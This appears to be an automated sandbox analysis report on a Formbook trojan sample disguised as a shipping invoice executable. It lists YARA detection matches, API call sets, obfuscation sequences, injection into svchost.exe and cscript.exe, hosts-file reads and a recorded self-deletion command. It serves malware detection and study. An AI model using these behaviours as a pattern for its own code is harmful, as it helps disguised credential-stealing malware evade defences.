Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe PID: 2412, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 236, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cscript.exe PID: 1368, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/4@13/5

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012B37B5 GetLastError,FormatMessageW,

0_2_012B37B5

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012A10BF AdjustTokenPrivileges,CloseHandle,		0_2_012A10BF
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_012A16C3

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012B51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_012B51CD

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012CA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_012CA67C

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012B648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_012B648E

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_012442A2

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

File created: C:\Users\user\AppData\Local\Temp\aut6C1C.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.v.c.h.o.s.t...e.x.e...........................B.......<.!.......!.....			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ....................H.!.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$.s............,.!.............................&.................!.....			Jump to behavior

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: van.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wlanhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wlanhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0BF754AA-C967-445C-AB3D-D8FDA9BAE7EF}\InProcServer32

Jump to behavior

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static file information: File size 1120256 > 1048576

Source: C:\Windows\explorer.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdb source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.348238153.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347630446.0000000002A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.356992362.0000000000720000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348109061.0000000000430000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348482025.0000000000590000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.356992362.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868679723.0000000002080000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.357247442.0000000001EF0000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.356948769.0000000000560000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868679723.0000000002200000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: cscript.pdbN source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.869745021.000000000880F000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868627962.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.00000000028AF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: cscript.pdb source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_012442DE

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01260A76 push ecx; ret	0_2_01260A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004191ED push ecx; iretd	2_2_004191EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040F365 pushad ; ret	2_2_0040F36D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418389 push esp; iretd	2_2_0041838B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004164DA push edi; retf	2_2_004164FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4F2 push eax; ret	2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4FB push eax; ret	2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4A5 push eax; ret	2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D55C push eax; ret	2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00407726 push esp; iretd	2_2_00407729
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073DFA1 push ecx; ret	2_2_0073DFB4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038E9B5 push esp; retn 0000h	2_2_0038EAE7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038EB1E push esp; retn 0000h	2_2_0038EB1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038EB02 push esp; retn 0000h	2_2_0038EB03
Source: C:\Windows\explorer.exe	Code function: 3_2_080E49B5 push esp; retn 0000h	3_2_080E4AE7
Source: C:\Windows\explorer.exe	Code function: 3_2_080E4B02 push esp; retn 0000h	3_2_080E4B03
Source: C:\Windows\explorer.exe	Code function: 3_2_080E4B1E push esp; retn 0000h	3_2_080E4B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_090A0B02 push esp; retn 0000h	3_2_090A0B03
Source: C:\Windows\explorer.exe	Code function: 3_2_090A0B1E push esp; retn 0000h	3_2_090A0B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_090A09B5 push esp; retn 0000h	3_2_090A0AE7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0035262B push ecx; ret	4_2_0035263E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209DFA1 push ecx; ret	4_2_0209DFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00080000 push C69438D7h; iretd	4_2_00080005
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_000991ED push ecx; iretd	4_2_000991EE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0008F365 pushad ; ret	4_2_0008F36D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00098389 push esp; iretd	4_2_0009838B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D4A5 push eax; ret	4_2_0009D4F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_000964DA push edi; retf	4_2_000964FE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D4FB push eax; ret	4_2_0009D562
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D4F2 push eax; ret	4_2_0009D4F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D55C push eax; ret	4_2_0009D562

Creates processes with suspicious names

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	File created: \commercail invoice and dhl awb tracking details.exe
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	File created: \commercail invoice and dhl awb tracking details.exe			Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

